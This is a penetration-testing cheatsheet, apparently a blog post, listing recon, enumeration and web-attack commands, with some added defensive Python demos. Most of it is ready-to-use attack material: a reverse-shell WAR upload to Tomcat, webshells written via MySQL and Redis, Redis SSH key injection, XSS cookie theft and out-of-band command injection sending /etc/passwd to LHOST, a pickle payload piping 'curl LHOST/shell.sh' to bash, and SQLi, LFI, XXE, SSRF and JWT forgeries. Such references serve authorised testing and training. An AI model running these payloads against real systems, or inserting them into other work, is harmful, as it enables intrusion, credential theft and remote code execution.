April 20, 2026

Penetration Testing Cheatsheet

A comprehensive reference for penetration testing methodology — recon through post-exploitation, privilege escalation, Active Directory, pivoting, and password cracking.

Tags: Pentesting, Cheatsheet, Reconnaissance, Privilege Escalation, Active Directory, Offensive

A comprehensive reference for penetration testing methodology, covering reconnaissance through post-exploitation.


1. Reconnaissance

Nmap Scanning

Quick Scans

bash
# Default script + version scan
nmap -sC -sV -oA nmap/initial $IP
 
# Full port scan (fast)
nmap -p- --min-rate 5000 -oA nmap/allports $IP
 
# Targeted scan on discovered ports
nmap -sC -sV -p 22,80,443,8080 -oA nmap/targeted $IP
 
# UDP top 20
sudo nmap -sU --top-ports 20 -oA nmap/udp $IP

Specialized Scans

bash
# Vulnerability scripts
nmap --script vuln -p 80,443 $IP
 
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 $IP
 
# HTTP enumeration
nmap --script http-enum -p 80,443 $IP
 
# OS detection
sudo nmap -O $IP
 
# Aggressive scan (noisy)
nmap -A $IP

Scan Types

| Flag | Type          | Use Case                                  |
|------|---------------|-------------------------------------------|
| -sS  | SYN (stealth) | Default, fast, doesn't complete handshake |
| -sT  | TCP connect   | When you can't do SYN (no root)           |
| -sU  | UDP           | DNS (53), SNMP (161), TFTP (69)           |
| -sV  | Version       | Service fingerprinting                    |
| -sC  | Scripts       | Default NSE scripts                       |
| -Pn  | No ping       | Host blocks ICMP                          |

Web Reconnaissance

Technology Fingerprinting

bash
# Identify web technologies
whatweb http://$IP
whatweb -a 3 http://$IP    # Aggressive mode
 
# Wappalyzer-style
httpx -u http://$IP -tech-detect
 
# Curl headers
curl -I http://$IP
curl -s http://$IP | head -50

Directory & File Brute-forcing

bash
# Gobuster
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster.txt
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -x php,txt,html,bak,old
 
# Feroxbuster (recursive)
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o ferox.txt
feroxbuster -u http://$IP -x php,aspx,jsp -d 2 -t 50
 
# Dirsearch
dirsearch -u http://$IP -e php,asp,aspx,jsp,html,txt
 
# ffuf
ffuf -u http://$IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o ffuf.json -of json

Subdomain & VHost Enumeration

bash
# Subdomain brute-force
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 
# VHost enumeration
gobuster vhost -u http://$IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
 
# ffuf VHost
ffuf -u http://$IP -H "Host: FUZZ.target.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>
 
# Certificate transparency
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u

Information Leaks

bash
# Common files to check
curl -s http://$IP/robots.txt
curl -s http://$IP/sitemap.xml
curl -s http://$IP/.env
curl -s http://$IP/.git/HEAD
curl -s http://$IP/wp-config.php.bak
curl -s http://$IP/server-status
curl -s http://$IP/.htaccess
curl -s http://$IP/crossdomain.xml
curl -s http://$IP/clientaccesspolicy.xml
 
# Git dump (if .git exposed)
git-dumper http://$IP/.git/ git-dump/

DNS Enumeration

bash
# Zone transfer
dig axfr @$IP target.com
 
# Any records
dig any target.com @$IP
 
# Specific records
dig A target.com @$IP
dig MX target.com @$IP
dig TXT target.com @$IP
dig NS target.com @$IP
 
# Reverse lookup
dig -x $IP @$IP
 
# DNSrecon
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr

SNMP Enumeration

bash
# Community string brute-force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt $IP
 
# Walk with known community string
snmpwalk -v2c -c public $IP
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.2   # Running processes
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.6.3.1.2   # Installed software
snmpwalk -v2c -c public $IP 1.3.6.1.4.1.77.1.2.25     # User accounts
 
# snmp-check
snmp-check $IP -c public

Reconnaissance Checklist

  1. Add hostnames to /etc/hosts
  2. Check for anonymous/default credentials
  3. Check all ports — don't skip high ports
  4. Note versions — search for CVEs
  5. Save all output to files

2. Service Enumeration

SMB (445/139)

bash
# Null session
smbclient -L //$IP/ -N
netexec smb $IP -u '' -p ''
netexec smb $IP -u 'guest' -p ''
 
# List shares
smbmap -H $IP
smbmap -H $IP -u user -p pass
netexec smb $IP -u user -p pass --shares
 
# Access shares
smbclient //$IP/share -U user%pass
smbclient //$IP/share -N
 
# Recursive download
smbclient //$IP/share -U user%pass -c 'recurse ON; prompt OFF; mget *'
smbget -R smb://$IP/share -U user%pass
 
# Enum4linux
enum4linux -a $IP
 
# Check for signing (relay attacks)
netexec smb $IP --gen-relay-list relay.txt

FTP (21)

bash
# Anonymous login
ftp $IP
# user: anonymous, pass: (blank or email)
 
# Check for write access
ftp> put test.txt
 
# Download everything
wget -r ftp://anonymous:@$IP/
 
# Common misconfigs
# - Anonymous login enabled
# - Writable directories
# - FTP root is web root

SSH (22)

bash
# Banner grab
nc -nv $IP 22
 
# Brute force
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP
netexec ssh $IP -u user -P /usr/share/wordlists/rockyou.txt
 
# Key-based login
chmod 600 id_rsa   # ssh refuses a key file that is group/world readable, so fix perms first
ssh -i id_rsa user@$IP
 
# Old algorithms
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss user@$IP

HTTP/HTTPS (80/443/8080)

bash
# Fingerprint
whatweb http://$IP
curl -I http://$IP
 
# Directory brute-force
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 
# VHost enumeration
gobuster vhost -u http://$IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
ffuf -u http://$IP -H "Host: FUZZ.target.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs SIZE
 
# API fuzzing
gobuster dir -u http://$IP/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
ffuf -u http://$IP/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
 
# Parameter fuzzing
ffuf -u "http://$IP/page?FUZZ=test" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs SIZE
 
# Nikto
nikto -h http://$IP
 
# Check common files
curl http://$IP/robots.txt
curl http://$IP/.env
curl http://$IP/.git/HEAD
curl http://$IP/sitemap.xml
curl http://$IP/server-status
curl http://$IP/server-info

DNS (53)

bash
# Zone transfer
dig axfr @$IP target.com
 
# Record queries
dig any target.com @$IP
dig A target.com @$IP
dig MX target.com @$IP
dig TXT target.com @$IP
dig NS target.com @$IP
 
# Reverse lookup
dig -x $IP @$IP
 
# Brute-force subdomains
dnsenum target.com --dnsserver $IP
dnsrecon -d target.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

LDAP (389/636)

bash
# Anonymous bind
ldapsearch -x -H ldap://$IP -b "" -s base namingContexts
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com"
 
# Authenticated
ldapsearch -x -H ldap://$IP -D "user@domain.com" -w 'password' -b "DC=domain,DC=com"
 
# Find users
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName
 
# Find computers
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=computer)" cn
 
# Dump everything
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "*"

Kerberos (88)

bash
# User enumeration
kerbrute userenum -d domain.com --dc $IP usernames.txt
 
# AS-REP Roast
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip $IP
 
# Kerberoast
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request

MSSQL (1433)

bash
# Connect
mssqlclient.py user:pass@$IP
mssqlclient.py user:pass@$IP -windows-auth
 
# Enable xp_cmdshell
enable_xp_cmdshell
xp_cmdshell whoami
 
# Enumerate
SELECT name FROM master..sysdatabases;
SELECT * FROM <db>.information_schema.tables;
SELECT * FROM <db>.dbo.<table>;
 
# NetExec
netexec mssql $IP -u user -p pass -x 'whoami'
netexec mssql $IP -u user -p pass -q 'SELECT name FROM master..sysdatabases'

MySQL (3306)

bash
# Connect
mysql -h $IP -u root -p
mysql -h $IP -u root
 
# Enumerate
SHOW databases;
USE <db>;
SHOW tables;
SELECT * FROM <table>;
 
# Read files (if FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
 
# Write files (if FILE privilege + secure_file_priv allows)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
 
# UDF for command execution
# Check: SELECT @@plugin_dir;

Redis (6379)

bash
# Connect (usually no auth)
redis-cli -h $IP
 
# Enumerate
INFO
CONFIG GET *
KEYS *
GET <key>
 
# Write webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET payload '<?php system($_GET["cmd"]); ?>'
SAVE
 
# SSH key injection
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET payload "\n\nssh-ed25519 AAAA... user@attacker\n\n"
SAVE

NFS (2049)

bash
# List exports
showmount -e $IP
 
# Mount
mkdir /tmp/nfs
mount -t nfs $IP:/share /tmp/nfs -o nolock
 
# Check for no_root_squash (privesc)
cat /etc/exports  # on target

SNMP (161/UDP)

bash
# Community string brute-force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt $IP
 
# Walk
snmpwalk -v2c -c public $IP
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.2    # processes
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.6.3.1.2    # software
snmpwalk -v2c -c public $IP 1.3.6.1.4.1.77.1.2.25      # users
 
# snmp-check
snmp-check $IP -c public

RPC (135/111)

bash
# Windows RPC
rpcclient -U "" -N $IP
rpcclient -U "user%pass" $IP
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> netshareenumall
 
# Linux RPC
rpcinfo -p $IP

WinRM (5985/5986)

bash
# Test access
netexec winrm $IP -u user -p pass
 
# Connect
evil-winrm -i $IP -u user -p 'password'
evil-winrm -i $IP -u user -H NTHASH

Tomcat (8080/8443)

bash
# Default creds: tomcat:tomcat, admin:admin, tomcat:s3cret
# Manager: /manager/html
# Host Manager: /host-manager/html
 
# Deploy WAR shell
msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=PORT -f war -o shell.war
curl --upload-file shell.war "http://user:pass@$IP:8080/manager/text/deploy?path=/shell"
curl http://$IP:8080/shell/

WordPress

bash
# Enumerate
wpscan --url http://$IP --enumerate u,p,t
wpscan --url http://$IP --enumerate u,ap,at --plugins-detection aggressive
 
# Brute force
wpscan --url http://$IP -U admin -P /usr/share/wordlists/rockyou.txt
 
# Key files
/wp-config.php
/wp-login.php
/wp-admin/
/xmlrpc.php
/wp-content/uploads/
/wp-content/plugins/

3. Web Application Attacks

SQL Injection

Detection

plaintext
' OR 1=1-- -
" OR 1=1-- -
' OR '1'='1
admin'--
1' ORDER BY 1-- -
1' UNION SELECT NULL-- -

Union-Based SQLi

sql
-- Find column count
' ORDER BY 1-- -
' ORDER BY 2-- -
' ORDER BY 3-- -
 
-- Find injectable columns
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 'a',NULL,NULL-- -
 
-- Extract data
' UNION SELECT username,password,NULL FROM users-- -
 
-- MySQL version & DB
' UNION SELECT version(),database(),NULL-- -
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'-- -

Blind SQLi

sql
-- Boolean-based
' AND 1=1-- -    (true)
' AND 1=2-- -    (false)
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'-- -
 
-- Time-based
' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)-- -
'; WAITFOR DELAY '0:0:5'-- -
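The detection, UNION and blind payloads above all work for one reason: the input is parsed as part of the SQL statement. The following added example (not part of the original cheatsheet) replays those payload shapes against a constructed in-memory SQLite table through two lookups, one that concatenates the input into the query and one that binds it as a parameter. The table contents and column names are assumptions for the demo, and SQLite's `SUBSTR` stands in for MySQL's `SUBSTRING`.

```python
import sqlite3

# Constructed stand-in for a target application's users table.
SEED_ROWS = [(1, "admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "letmein")]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Concatenation: the input is parsed as SQL, so a quote, OR, UNION or a
    comment sequence (-- -) rewrites the statement."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameter binding: the same bytes arrive as a string value, never as grammar."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def run_payloads(conn: sqlite3.Connection) -> dict:
    """Replay the cheatsheet's payload shapes and record what each lookup returns."""
    payloads = {
        "tautology": "' OR 1=1-- -",                 # every row comes back
        "comment": "admin'--",                        # closing quote commented away
        "blind_true": "admin' AND 1=1-- -",           # behaves like plain 'admin'
        "blind_false": "admin' AND 1=2-- -",          # empty result: the differential
        "blind_substr": "admin' AND (SELECT SUBSTR(username,1,1) FROM users WHERE id=1)='a'-- -",
        "union": "' UNION SELECT id, password FROM users-- -",  # 2nd column now carries passwords
    }
    return {
        name: {"vulnerable": lookup_vulnerable(conn, p), "safe": lookup_safe(conn, p)}
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, result in run_payloads(build_db()).items():
        print(f"{name:13} vulnerable={result['vulnerable']}  safe={result['safe']}")
```

With binding, every payload simply fails to match a username and returns nothing, which is also the reason SQLMap's boolean and UNION techniques find nothing against such an endpoint.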

SQLMap

bash
# Basic
sqlmap -u "http://$IP/page?id=1" --batch
 
# POST request
sqlmap -u "http://$IP/login" --data="user=admin&pass=test" --batch
 
# With cookie/header
sqlmap -u "http://$IP/page?id=1" --cookie="session=abc123" --batch
 
# Dump database
sqlmap -u "http://$IP/page?id=1" --dbs
sqlmap -u "http://$IP/page?id=1" -D dbname --tables
sqlmap -u "http://$IP/page?id=1" -D dbname -T users --dump
 
# OS shell
sqlmap -u "http://$IP/page?id=1" --os-shell

Cross-Site Scripting (XSS)

Payloads

html
<!-- Basic -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
 
<!-- Attribute injection -->
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
 
<!-- Filter bypass -->
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert(1)>
javascript:alert(1)
 
<!-- Cookie steal -->
<script>document.location='http://LHOST/?c='+document.cookie</script>
<img src=x onerror="fetch('http://LHOST/?c='+document.cookie)">

Server-Side Template Injection (SSTI)

Detection

plaintext
{{7*7}}         → 49 (Jinja2/Twig)
${7*7}          → 49 (FreeMarker/Mako)
#{7*7}          → 49 (Thymeleaf/Ruby ERB)
<%= 7*7 %>      → 49 (ERB)

Exploitation

python
# Jinja2 (Python)
{{config}}
{{config.items()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()}}
 
# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}

ruby
# ERB (Ruby)
<%= system("id") %>
<%= `id` %>

Command Injection

Operators

bash
; id                    # Sequential
| id                    # Pipe
|| id                   # OR (runs if first fails)
&& id                   # AND (runs if first succeeds)
$(id)                   # Command substitution
`id`                    # Backtick substitution
%0aid                   # Newline (URL encoded)

Blind Command Injection

bash
# Time-based
; sleep 5
| sleep 5
& ping -c 5 127.0.0.1 &
 
# Out-of-band
; curl http://LHOST/$(whoami)
; nslookup $(whoami).LHOST
; wget http://LHOST/$(cat /etc/passwd | base64)
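Every operator in the two lists above is interpreted by the shell, not by the program the developer meant to run. This added example (not from the original page) shows the same payloads reaching `/bin/sh` through `shell=True` and the two changes that stop them: pass argv as a list so no shell is involved, and validate the value against the shape you expect. `echo` stands in for `ping` so it runs offline, and the hostname pattern is an assumption for the demo.

```python
import re
import subprocess

# Hostnames/IPs only: letters, digits, dots, hyphens. ; | & $ ` and newlines are refused.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def probe_vulnerable(host: str) -> str:
    """shell=True hands the whole string to /bin/sh, so the cheatsheet's operators
    are interpreted. 'echo' replaces 'ping' so the demo runs offline."""
    cmd = f"echo probing {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def probe_list_only(host: str) -> str:
    """argv as a list, no shell: metacharacters become ordinary argument text."""
    return subprocess.run(["echo", "probing", host], capture_output=True, text=True).stdout


def probe_safe(host: str) -> str:
    """Defence in depth: validate the value, then use the list form."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host {host!r}")
    return probe_list_only(host)


def rejects(host: str) -> bool:
    try:
        probe_safe(host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for h in ("127.0.0.1; echo INJECTED", "$(echo SUBST)", "example.com"):
        print(repr(h), "->", repr(probe_vulnerable(h)), "| list:", repr(probe_list_only(h)))
```

The list form alone already defeats injection; the validator additionally keeps surprising but shell-free inputs (spaces, very long strings) out of the command.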

File Inclusion

Local File Inclusion (LFI)

plaintext
# Basic
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
 
# Null byte (PHP < 5.3)
?page=../../../../etc/passwd%00
 
# PHP wrappers
?page=php://filter/convert.base64-encode/resource=index.php
?page=php://input  (POST: <?php system('id'); ?>)
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
?page=expect://id
 
# Log poisoning
?page=/var/log/apache2/access.log
# Then send request with User-Agent: <?php system($_GET['cmd']); ?>

Remote File Inclusion (RFI)

plaintext
?page=http://LHOST/shell.php
?page=http://LHOST/shell.txt
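The `....//` form exists because many applications "fix" LFI by deleting `../` once, which turns `....//` back into `../`. This added example (not from the original page) contrasts that filter with a containment check on the fully resolved path, which also disposes of the wrapper, null-byte, absolute-path and RFI variants above. `PAGES_DIR` is a constructed base directory; nothing needs to exist on disk for the check to run.

```python
import os
from urllib.parse import unquote

# Constructed base directory that included pages are supposed to live under.
PAGES_DIR = "/var/www/pages"


def naive_sanitize(page: str) -> str:
    """The common 'strip ../' filter that the ....// payload is built to defeat."""
    return page.replace("../", "")


def resolve_vulnerable(page: str) -> str:
    """Decode, strip once, join: a single pass over '../' is not a containment check."""
    cleaned = naive_sanitize(unquote(page))
    return os.path.normpath(os.path.join(PAGES_DIR, cleaned))


def resolve_safe(page: str) -> str:
    """Refuse wrappers and NUL, then prove the resolved path is still under the base."""
    decoded = unquote(page)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    if "://" in decoded:
        raise ValueError("URL or stream wrapper not allowed")  # php://, data://, expect://, http://
    base = os.path.realpath(PAGES_DIR)
    target = os.path.realpath(os.path.join(base, decoded))     # absolute input replaces base here
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory")
    return target


def escapes_base(path: str) -> bool:
    base = os.path.normpath(PAGES_DIR)
    return os.path.commonpath([base, os.path.normpath(path)]) != base


def is_rejected(page: str) -> bool:
    try:
        resolve_safe(page)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for p in ("../../../../etc/passwd", "....//....//....//etc/passwd", "about.html"):
        print(f"{p:32} naive -> {resolve_vulnerable(p):28} rejected by safe check: {is_rejected(p)}")
```

Note that the safe resolver does not reject `....//....//....//etc/passwd`: once no stripping happens it is just a path to a non-existent `....` directory inside the base, which is exactly the point.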

File Upload

Bypass Techniques

plaintext
# Extension bypass
.php → .php5, .phtml, .phar, .phps, .pHP
.asp → .aspx, .ashx, .asmx, .asp;.jpg
.jsp → .jspx, .jsw, .jsv
 
# Content-Type bypass
Change Content-Type to: image/png, image/jpeg, image/gif
 
# Magic bytes
GIF89a;<?php system($_GET['cmd']); ?>
Add PNG header: \x89PNG\r\n\x1a\n before PHP code
 
# Double extension
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
 
# .htaccess upload
AddType application/x-httpd-php .jpg

Deserialization

PHP

php
# Look for unserialize() with user input
O:4:"User":2:{s:4:"name";s:5:"admin";s:6:"isAdmin";b:1;}

Python (Pickle)

python
import pickle, os, base64
 
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl http://LHOST/shell.sh | bash',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())
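The `__reduce__` gadget above works because `pickle.loads` will import and call whatever global the byte stream names. This added example (not from the original page) keeps the same mechanism but swaps the callable for a harmless `echo`, then shows the standard mitigation from the `pickle` documentation: an `Unpickler` whose `find_class` only resolves an allow-list, so the gadget is refused before anything is built. `Profile` is a constructed application type; the allow-list contents are an assumption for the demo.

```python
import io
import pickle
import subprocess


class Profile:
    """Legitimate application type that should round-trip through pickle."""
    def __init__(self, name: str, roles: list):
        self.name = name
        self.roles = roles


class Gadget:
    """Constructed stand-in for the page's __reduce__ payload: same mechanism, but the
    callable it smuggles in runs a harmless echo instead of curl | bash."""
    def __reduce__(self):
        return (subprocess.check_output, (["echo", "code ran during unpickle"],))


class RestrictedUnpickler(pickle.Unpickler):
    """Only globals on the allow-list may be resolved; anything else is refused before
    any object is constructed, so a smuggled callable is never reached."""
    ALLOWED = {(Profile.__module__, "Profile")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name} from untrusted pickle")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo() -> tuple:
    payload = pickle.dumps(Gadget())          # what an attacker would submit to the app
    executed = pickle.loads(payload)          # plain loads: the echo runs, its output is returned
    try:
        safe_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    restored = safe_loads(pickle.dumps(Profile("alice", ["user"])))   # legitimate data still works
    return executed, blocked, restored


if __name__ == "__main__":
    executed, blocked, restored = demo()
    print("plain loads executed:", executed.strip(), "| gadget blocked:", blocked,
          "| restored:", restored.name, restored.roles)
```

The allow-list must be exact `(module, name)` pairs; allowing a whole module such as `builtins` reintroduces `eval` and `getattr`, which is enough to rebuild the gadget.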

Java

bash
# ysoserial
java -jar ysoserial.jar CommonsCollections1 'ping LHOST' | base64

XXE (XML External Entity)

xml
<!-- Read file -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
 
<!-- SSRF -->
<!ENTITY xxe SYSTEM "http://internal-server/admin">
 
<!-- Blind XXE (out-of-band) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://LHOST/evil.dtd">
%dtd;

SSRF (Server-Side Request Forgery)

plaintext
# Localhost access
http://127.0.0.1/admin
http://localhost/admin
http://0.0.0.0/admin
http://[::1]/admin
http://0x7f000001/admin
http://2130706433/admin
 
# Cloud metadata
http://169.254.169.254/latest/meta-data/    (AWS)
http://metadata.google.internal/             (GCP)
http://169.254.169.254/metadata/instance     (Azure)
 
# Internal port scanning
http://127.0.0.1:PORT/
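The localhost list above is long because a blocklist of strings (`127.0.0.1`, `localhost`) misses every alternative spelling the OS resolver accepts. This added example (not from the original page) normalises a URL's host with `ipaddress` and `socket.inet_aton`, so the decimal, hex, `0.0.0.0`, `[::1]` and link-local metadata forms all collapse to the same verdict, and names are handed back for resolution rather than trusted. The public address in the test is a constructed sample; the verdict names are an assumption for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def literal_ip(host: str):
    """Return an ipaddress object if host is any numeric spelling of an address
    (dotted quad, IPv6 literal, bare decimal, 0x hex, short forms), else None."""
    h = host.strip("[]")
    try:
        return ipaddress.ip_address(h)
    except ValueError:
        pass
    try:  # inet_aton accepts 2130706433, 0x7f000001 and 127.1: exactly what string filters miss
        return ipaddress.ip_address(socket.inet_aton(h))
    except OSError:
        return None


def is_internal(ip) -> bool:
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def verdict(url: str) -> str:
    """'deny', 'allow', or 'resolve' (a name that must be resolved and re-checked)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "deny"                        # file://, gopher://, dict:// and friends
    host = parts.hostname
    if not host:
        return "deny"
    if host == "localhost" or host.endswith(".localhost"):
        return "deny"
    ip = literal_ip(host)
    if ip is None:
        # A name: resolve it yourself, run is_internal() on every A/AAAA record, and
        # connect to that pinned address so a rebinding answer can't swap it later.
        return "resolve"
    return "deny" if is_internal(ip) else "allow"


if __name__ == "__main__":
    for u in ("http://127.0.0.1/admin", "http://0x7f000001/admin", "http://2130706433/admin",
              "http://[::1]/admin", "http://169.254.169.254/latest/meta-data/",
              "http://metadata.google.internal/", "http://8.8.8.8/"):
        print(f"{u:45} {verdict(u)}")
```

Redirects need the same treatment: a public URL that 302s to `169.254.169.254` bypasses a check that only looks at the initial request, so follow redirects manually and re-run `verdict` on each hop.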

JWT Attacks

bash
# None algorithm — change header to {"alg": "none"}, empty signature
# Key confusion — RS256 → HS256, sign with public key as HMAC secret
python3 jwt_tool.py <token> -X k -pk public.pem
 
# JKU/X5U injection — host your own JWKS
python3 jwt_tool.py <token> -X s -ju http://ATTACKER/jwks.json
 
# KID injection (path traversal)
# Header: {"kid": "../../dev/null", "alg": "HS256"} → sign with empty string
 
# Comprehensive testing
python3 jwt_tool.py <token> -M at                    # All tests
python3 jwt_tool.py <token> -C -d wordlist.txt       # Crack secret
python3 jwt_tool.py <token> -I -pc name -pv admin    # Inject claim
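The `none` and key-confusion attacks above share one root cause: the verifier lets the token's own header choose the algorithm. This added example (not from the original page or from jwt_tool) builds HS256 tokens with only the standard library, shows a verifier that trusts the header accepting an `alg: none` forgery, and a pinned verifier that rejects it. The secret and claims are constructed for the demo; RS256 key confusion needs an RSA library and is not reproduced, but the same pinning rule is what prevents it.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"   # placeholder HMAC key for the demo


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    signing_input = f"{encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{encode_part(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_none(claims: dict) -> str:
    """The tampering the page describes: header alg set to 'none', signature emptied."""
    return f"{encode_part({'alg': 'none', 'typ': 'JWT'})}.{encode_part(claims)}."


def verify_trusting_header(token: str, secret: bytes) -> dict:
    """Vulnerable pattern: the token's header decides how (or whether) to verify."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))
    if alg == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    raise ValueError("signature check failed")


def verify_pinned(token: str, secret: bytes, expected_alg: str = "HS256") -> dict:
    """Hardened: the server chooses the algorithm; the header may only agree with it."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    if json.loads(b64url_decode(h)).get("alg") != expected_alg:
        raise ValueError("algorithm not permitted")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("signature check failed")
    return json.loads(b64url_decode(p))


def is_rejected(verifier, token: str, secret: bytes = SECRET) -> bool:
    try:
        verifier(token, secret)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    forged = forge_none({"sub": "alice", "admin": True})
    print("header-trusting verifier accepts forgery:", verify_trusting_header(forged, SECRET))
    print("pinned verifier rejects forgery:", is_rejected(verify_pinned, forged))
```

The same rule covers `kid`, `jku` and `x5u`: key material is looked up from server-side configuration, and header fields are at most an index into an allow-list, never a path or URL to fetch.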

OAuth/OIDC Attacks

bash
# Open redirect → token theft
# Manipulate redirect_uri:
https://auth.target.com/authorize?client_id=X&redirect_uri=https://evil.com&response_type=token
 
# Authorization code injection — intercept and replay against different client
# Device code flow phishing — generate device code, phish user to enter at login page
# SSRF via OAuth callbacks — register app with callback to internal services
# Scope escalation — request broader scopes than intended

HTTP Request Smuggling

plaintext
# CL.TE (front-end: Content-Length, back-end: Transfer-Encoding)
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked
 
0
 
SMUGGLED
 
# TE.CL
POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked
 
8
SMUGGLED
0
 
